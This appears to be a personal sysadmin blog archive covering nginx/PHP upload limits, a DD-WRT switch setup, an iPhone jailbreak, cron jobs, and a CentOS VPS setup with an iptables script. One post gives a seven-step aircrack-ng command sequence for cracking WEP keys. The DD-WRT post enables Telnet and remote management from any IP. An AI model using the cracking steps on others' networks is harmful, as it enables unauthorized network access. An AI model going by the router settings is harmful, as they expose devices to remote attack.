Increasing PHP File Upload Size on nginx

I am running nginx + php-fpm. I was posting new products to my newly set up Magento website, but when I uploaded a product image I got the “HTTP Upload Error.” I searched online, but did not find the answer to my problem. It turns out that the “HTTP Upload Error” meant that the uploaded file exceeded the maximum size allowed by php-fpm.

To raise the upload limit, set the following:

# /etc/php.ini
upload_max_filesize = 5M
; Usually double the "upload_max_filesize" (comments in php.ini start with ";")
post_max_size = 10M
; Time in seconds the PHP service spends receiving your file before it closes its connection with you.
; It is better to set a higher number if you upload large files. I set mine to 100 seconds,
; which should be enough time for me to upload a 5MB file.
max_input_time = 100

# one of your nginx *.conf that contains your domain config
# /etc/nginx/conf.d/virtual.conf
# add the code below within server {}
client_max_body_size 5m;

Now simply restart nginx and php-fpm for the changes to take effect:

service nginx restart
service php-fpm restart
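
The three limits above sit at two layers (nginx in front, PHP behind), and a mismatch decides which layer rejects an upload. The following check is an added example, not part of the original post; the function names and finding labels are made up for illustration, and the sizes are passed in as arguments rather than read from the live configuration.

```shell
#!/bin/sh
# Added example (not from the original post): sanity-check the three limits.

# to_bytes SIZE: convert PHP/nginx shorthand (K, M, G, any case) to bytes.
to_bytes() {
    num=${1%[KkMmGg]}
    case $1 in
        *[Kk]) echo $((num * 1024)) ;;
        *[Mm]) echo $((num * 1024 * 1024)) ;;
        *[Gg]) echo $((num * 1024 * 1024 * 1024)) ;;
        *)     echo "$num" ;;
    esac
}

# check_upload_limits UPLOAD_MAX_FILESIZE POST_MAX_SIZE CLIENT_MAX_BODY_SIZE
# Prints space-separated findings, or "ok" when the layers line up.
check_upload_limits() {
    file=$(to_bytes "$1"); post=$(to_bytes "$2"); body=$(to_bytes "$3")
    out=""
    if [ "$body" -eq 0 ]; then
        # client_max_body_size 0 turns the nginx check off entirely.
        out="nginx-limit-disabled"
    else
        # nginx measures the whole request body (file plus multipart framing),
        # so a limit equal to the file limit rejects a maximum-size file (413).
        if [ "$body" -le "$file" ]; then out="nginx-rejects-largest-file"; fi
        # Bodies above post_max_size are discarded by PHP; reject them at nginx.
        if [ "$body" -gt "$post" ]; then
            out="${out:+$out }nginx-forwards-bodies-php-discards"
        fi
    fi
    if [ "$post" -lt "$file" ]; then
        out="${out:+$out }post-max-below-file-max"
    fi
    echo "${out:-ok}"
}

check_upload_limits 5M 10M 5m    # the values used in this post
check_upload_limits 5M 10M 10m   # nginx limit raised to match post_max_size
```

Keeping the nginx limit above the largest file but no higher than post_max_size means oversized requests are refused at the front door instead of being streamed to PHP first.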

 

Cracking my WEP with Backtrack/Kali

*This post is for educational purposes only! Please do not use it against other people!

When my friends ask me to set up their router for a Wi-Fi connection, I always make sure that the encryption is WPA with a strong password. The reason is that WEP can be easily cracked using a Linux tool called aircrack-ng.

We will be using a Linux operating system called Kali (Backtrack). The time it takes to crack the password depends on your Wi-Fi signal. A strong Wi-Fi signal is recommended. You will

1)airmon-ng
2)airmon-ng start wlan0
3)airodump-ng mon0
4)airodump-ng -c (channel) -w (file name) --bssid (bssid) mon0
5)aireplay-ng -1 0 -a (bssid) mon0
6)aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b (bssid) mon0
7)aircrack-ng (filename)*.cap

Author: Jason Lin

Setting up DD-WRT router as a switch

This is a post on the DD-WRT forum by x1st. Original link here

 

5th time is a charm!

This time, rather than following the wiki, I went with the intuitive method and now have a working solution.

The primary DHCP router is located at 192.168.1.254. I left the dd-wrt secondary router at 192.168.1.1 (I had done this on the original attempt but it still wouldn’t find the router.)

I suspect the settings in the GUI that are defaulted to off/disabled may have been an issue and I don’t remember if on the first time I had changed these.

Either way, here is what I did in case anyone else finds this post and is having the same problem.

This is for a wired connection to my primary router which handles DHCP. I also was wired into the router for the setup (don’t plug into the WAN port on the router for upstream connections, only use the PC/LAN ports for both upstream and then to the individual computers)

For reference: DD-WRT v24-sp2 (08/07/10) std (SVN revision 14896)

Setup -> Basic Setup
Connection Type – Disabled
Router IP – 192.168.1.1/255.255.255.0 (Same subnet as my primary router and not within the DHCP range. Primary router is a DSL/WAP modem/router in one and I can’t control the DHCP range which is 192.168.1.65-254)
Gateway & Local DNS – left empty
DHCP Server – Disabled (radio button)
DNSMasq options – Deselect both

SAVE

Setup -> Advanced Routing
Operating Mode – Router

SAVE

Wireless – configure this later after getting a working solution.

Services -> Services
DNSMasq – Disabled
Secure Shell – SSHd – enable
Telnet – Enable
traff Daemon – Disabled

SAVE

Security -> Firewall (I left everything default)
SPI Firewall – I left enabled

SAVE

Administration -> Management
Web Access
– Enable info Site – Enable
– Info Site Password Protection – Enabled
– Info Site MAC Masking – Enable

Remote Access
– Web GUI Management – Enable
– SSH Management- Enable
– Telnet Management – Enable
– Allow Any Remote IP – Enable

SAVE
APPLY SETTINGS

Hope that helps.

Jailbreak iPhone 5, iPhone 4S, iPhone 4, or iPhone 3GS on iOS 6.0 to iOS 6.1.2 using Evasi0n on Windows

Just got my iPhone 5 with firmware 6.0.2 with T-Mobile and I am excited to jailbreak it.

Here are the steps to jailbreak the iPhone 5, iPhone 4S, iPhone 4, or iPhone 3GS on iOS 6.0 to iOS 6.1.2 using Evasi0n on Windows.

  1. Download Evasi0n here for Windows.
  2. After you have downloaded the above, extract it to get the Evasi0n files within your extracted folder.
  3. Right click on the evasi0n icon and click on Run as Administrator then click on yes.
  4. Now simply plug in your iPhone if you haven’t done so and close iTunes if it’s open. Evasi0n will automatically detect your iPhone and verify whether it can be jailbroken, which makes the process foolproof.
  5. Once plugged in, you can simply click Jailbreak to start the process.
  6. At almost 75%, Evasi0n will tell you to unlock your iPhone and open up the Jailbreak app within your iPhone.
  7. Done! (If you would like to support the Dev-Team, please click on “Support Us (Paypal)” within the software; they have done a great job.)

Setting up Cron Jobs

Setting up a cron job is a very useful Linux feature if you want to automate commands to run at a certain time.

# to list the cron jobs of the current user
crontab -l

# to create a new cron job
crontab -u user -e

*Note: I am currently running CentOS 6 and editing /etc/crontab did not work. Also, putting a new line after your cron job is required.

How to Set Up a VPS/Dedicated Server for the First Time on CentOS 6.x (LEMP Version)

I just signed up for this great deal at ChicagoVPS.net for a 2GB RAM, 2TB/Month, 50GB space at $40 + Tax (NY) / Year. (Check the deal at SlickDeals.net, as of March 09)

I thought that the deal was great and wanted to give them a try.

ChicagoVPS was cheap, but it did not stand for what it was worth. I had a lot of downtime during the month. I finally got a new dedicated server for my websites.

I am writing this blog for my own reference, and I think the information I gathered over the internet will be helpful to you as well when you are setting up your VPS servers. Therefore I set up this blog on my unused web domain name. If you find any mistakes or have comments, please feel free to post them.

Requirements:

Updating

The first time you run the server, you should always update the system.

yum update

Firewall

A firewall is, and always will be, the number one thing to set up before starting anything. I found a good script online that will set up your firewall. (Need to find where I got it from to give credit)

Save the iptables script below as iptables.sh. Please note that I opened port 8080 for Varnish tests. You may close it by removing that line.

#!/bin/bash
# A sample firewall shell script 
IPT="/sbin/iptables"
SPAMLIST="blockedip"
SPAMDROPMSG="BLOCKED IP DROP"
SYSCTL="/sbin/sysctl"
BLOCKEDIPS="/root/scripts/blocked.ips.txt"

# Stop certain attacks
echo "Setting sysctl IPv4 settings..."
$SYSCTL net.ipv4.ip_forward=0
$SYSCTL net.ipv4.conf.all.send_redirects=0
$SYSCTL net.ipv4.conf.default.send_redirects=0
$SYSCTL net.ipv4.conf.all.accept_source_route=0
$SYSCTL net.ipv4.conf.all.accept_redirects=0
$SYSCTL net.ipv4.conf.all.secure_redirects=0
$SYSCTL net.ipv4.conf.all.log_martians=1
$SYSCTL net.ipv4.conf.default.accept_source_route=0
$SYSCTL net.ipv4.conf.default.accept_redirects=0
$SYSCTL net.ipv4.conf.default.secure_redirects=0
$SYSCTL net.ipv4.icmp_echo_ignore_broadcasts=1
#$SYSCTL net.ipv4.icmp_ignore_bogus_error_messages=1
$SYSCTL net.ipv4.tcp_syncookies=1
$SYSCTL net.ipv4.conf.all.rp_filter=1
$SYSCTL net.ipv4.conf.default.rp_filter=1
$SYSCTL kernel.exec-shield=1
# 2 = full ASLR (stack, mmap, VDSO and heap); 1 leaves the brk heap unrandomized
$SYSCTL kernel.randomize_va_space=2

echo "Starting IPv4 Firewall..."
$IPT -F
$IPT -X
$IPT -t nat -F
$IPT -t nat -X
$IPT -t mangle -F
$IPT -t mangle -X

# interface connected to the Internet 
PUB_IF="eth0"

#Unlimited traffic for loopback
$IPT -A INPUT -i lo -j ACCEPT
$IPT -A OUTPUT -o lo -j ACCEPT

# Default policy: DROP all traffic that is not explicitly allowed below
$IPT -P INPUT DROP
$IPT -P OUTPUT DROP
$IPT -P FORWARD DROP

# Log and drop new TCP connections that do not start with a SYN packet
$IPT -A INPUT -i ${PUB_IF} -p tcp ! --syn -m state --state NEW  -m limit --limit 5/m --limit-burst 7 -j LOG --log-level 4 --log-prefix "Drop Sync"
$IPT -A INPUT -i ${PUB_IF} -p tcp ! --syn -m state --state NEW -j DROP

# Block Fragments
$IPT -A INPUT -i ${PUB_IF} -f  -m limit --limit 5/m --limit-burst 7 -j LOG --log-level 4 --log-prefix "Fragments Packets"
$IPT -A INPUT -i ${PUB_IF} -f -j DROP

# Drop packets with invalid TCP flag combinations (Xmas, all flags set, NULL and similar scan probes)
$IPT  -A INPUT -i ${PUB_IF} -p tcp --tcp-flags ALL FIN,URG,PSH -j DROP
$IPT  -A INPUT -i ${PUB_IF} -p tcp --tcp-flags ALL ALL -j DROP

$IPT  -A INPUT -i ${PUB_IF} -p tcp --tcp-flags ALL NONE -m limit --limit 5/m --limit-burst 7 -j LOG --log-level 4 --log-prefix "NULL Packets"
$IPT  -A INPUT -i ${PUB_IF} -p tcp --tcp-flags ALL NONE -j DROP # NULL packets

$IPT  -A INPUT -i ${PUB_IF} -p tcp --tcp-flags SYN,RST SYN,RST -j DROP

$IPT  -A INPUT -i ${PUB_IF} -p tcp --tcp-flags SYN,FIN SYN,FIN -m limit --limit 5/m --limit-burst 7 -j LOG --log-level 4 --log-prefix "XMAS Packets"
$IPT  -A INPUT -i ${PUB_IF} -p tcp --tcp-flags SYN,FIN SYN,FIN -j DROP # SYN+FIN set together (logged with the "XMAS Packets" prefix)

$IPT  -A INPUT -i ${PUB_IF} -p tcp --tcp-flags FIN,ACK FIN -m limit --limit 5/m --limit-burst 7 -j LOG --log-level 4 --log-prefix "Fin Packets Scan"
$IPT  -A INPUT -i ${PUB_IF} -p tcp --tcp-flags FIN,ACK FIN -j DROP # FIN packet scans

$IPT  -A INPUT -i ${PUB_IF} -p tcp --tcp-flags ALL SYN,RST,ACK,FIN,URG -j DROP

# Allow all outgoing connections, and incoming traffic only for connections that are already established
$IPT -A INPUT -i ${PUB_IF} -m state --state ESTABLISHED,RELATED -j ACCEPT
$IPT -A OUTPUT -o ${PUB_IF} -m state --state NEW,ESTABLISHED,RELATED -j ACCEPT

# Allow ssh
$IPT -A INPUT -i ${PUB_IF} -p tcp --destination-port 22 -j ACCEPT

# Allow http / https (open port 80 / 443)
$IPT -A INPUT -i ${PUB_IF} -p tcp --destination-port 80 -j ACCEPT
$IPT -A INPUT -i ${PUB_IF} -p tcp --destination-port 443 -j ACCEPT
$IPT -A INPUT -i ${PUB_IF} -p tcp --destination-port 8080 -j ACCEPT

# Allow incoming ICMP echo requests (ping)
$IPT -A INPUT -i ${PUB_IF} -p icmp --icmp-type 8 -m state --state NEW,ESTABLISHED,RELATED -j ACCEPT
#$IPT -A OUTPUT -o ${PUB_IF} -p icmp --icmp-type 0 -m state --state ESTABLISHED,RELATED -j ACCEPT

# Allow port 53 tcp/udp (DNS Server)
#$IPT -A INPUT -i ${PUB_IF} -p udp --dport 53 -m state --state NEW,ESTABLISHED,RELATED -j ACCEPT
##$IPT -A OUTPUT -o ${PUB_IF} -p udp --sport 53 -m state --state ESTABLISHED,RELATED -j ACCEPT

#$IPT -A INPUT -i ${PUB_IF} -p tcp --destination-port 53 -m state --state NEW,ESTABLISHED,RELATED  -j ACCEPT
##$IPT -A OUTPUT -o ${PUB_IF} -p tcp --sport 53 -m state --state ESTABLISHED,RELATED -j ACCEPT

# Open port 110 (pop3) / 143
#$IPT -A INPUT -i ${PUB_IF} -p tcp --destination-port 110 -j ACCEPT
#$IPT -A INPUT -i ${PUB_IF} -p tcp --destination-port 143 -j ACCEPT

##### Add your rules below ######
#
# 
##### END your rules ############

# Do not log smb/windows sharing packets - too much logging
$IPT -A INPUT -p tcp -i ${PUB_IF} --dport 137:139 -j REJECT
$IPT -A INPUT -p udp -i ${PUB_IF} --dport 137:139 -j REJECT

# log everything else and drop
$IPT -A INPUT -j LOG
$IPT -A FORWARD -j LOG
$IPT -A INPUT -j DROP

exit 0

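Saving the iptables rules for the next reboots

# iptables-save on its own only prints the rules; on CentOS 6 this writes them to /etc/sysconfig/iptables
service iptables save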
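
Once the rules are loaded, it is worth confirming what the host actually accepts, for example that the port 8080 test rule was removed again. The script below is an added example, not part of the original post or the firewall script; the sample dump is constructed to mirror the rules above, and the function names are made up for illustration.

```shell
#!/bin/sh
# Added example (not from the original post): audit an iptables-save dump.

# Constructed sample of how the script's INPUT rules look in `iptables-save`
# output, which prints --destination-port as --dport.
SAMPLE_RULES='*filter
:INPUT DROP [0:0]
:FORWARD DROP [0:0]
:OUTPUT DROP [0:0]
-A INPUT -i lo -j ACCEPT
-A INPUT -i eth0 -m state --state RELATED,ESTABLISHED -j ACCEPT
-A INPUT -i eth0 -p tcp -m tcp --dport 22 -j ACCEPT
-A INPUT -i eth0 -p tcp -m tcp --dport 80 -j ACCEPT
-A INPUT -i eth0 -p tcp -m tcp --dport 443 -j ACCEPT
-A INPUT -i eth0 -p tcp -m tcp --dport 8080 -j ACCEPT
-A INPUT -i eth0 -p tcp -m tcp --dport 137:139 -j REJECT --reject-with icmp-port-unreachable
-A INPUT -j LOG
-A INPUT -j DROP
COMMIT'

# input_policy: print the default policy of the INPUT chain (stdin: dump).
input_policy() {
    awk '$1 == ":INPUT" { print $2 }'
}

# accepted_tcp_ports: print the TCP ports that INPUT rules ACCEPT, sorted.
accepted_tcp_ports() {
    awk '$1 == "-A" && $2 == "INPUT" && / -p tcp / && / -j ACCEPT/ {
             for (i = 1; i < NF; i++) if ($i == "--dport") print $(i + 1)
         }' | sort -n | paste -sd ' ' -
}

# unexpected_ports "ALLOWED": accepted ports that are not in the allowed list.
unexpected_ports() {
    allowed=" $1 "
    result=""
    for p in $(accepted_tcp_ports); do
        case $allowed in
            *" $p "*) ;;
            *) result="${result:+$result }$p" ;;
        esac
    done
    echo "$result"
}

echo "policy:     $(printf '%s\n' "$SAMPLE_RULES" | input_policy)"
echo "accepted:   $(printf '%s\n' "$SAMPLE_RULES" | accepted_tcp_ports)"
echo "unexpected: $(printf '%s\n' "$SAMPLE_RULES" | unexpected_ports "22 80 443")"
```

On a live server, pipe the real dump in instead of the sample, e.g. `iptables-save | unexpected_ports "22 80 443"` as root.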

Backing up

Whether you are on a VPS or a dedicated server, with managed or unmanaged hosting, you should always back up, and back up your backups too. Hey, things happen, and I learned that from buying cheap hosting at ChicagoVPS (move away from them).

Click here to check “How to Backup to Raspberry Pi”

Nginx, PHP, and mySQL – LEMP Web Server

 

Security

Skipfish

yum install skipfish -y (More info about skipfish will be posted)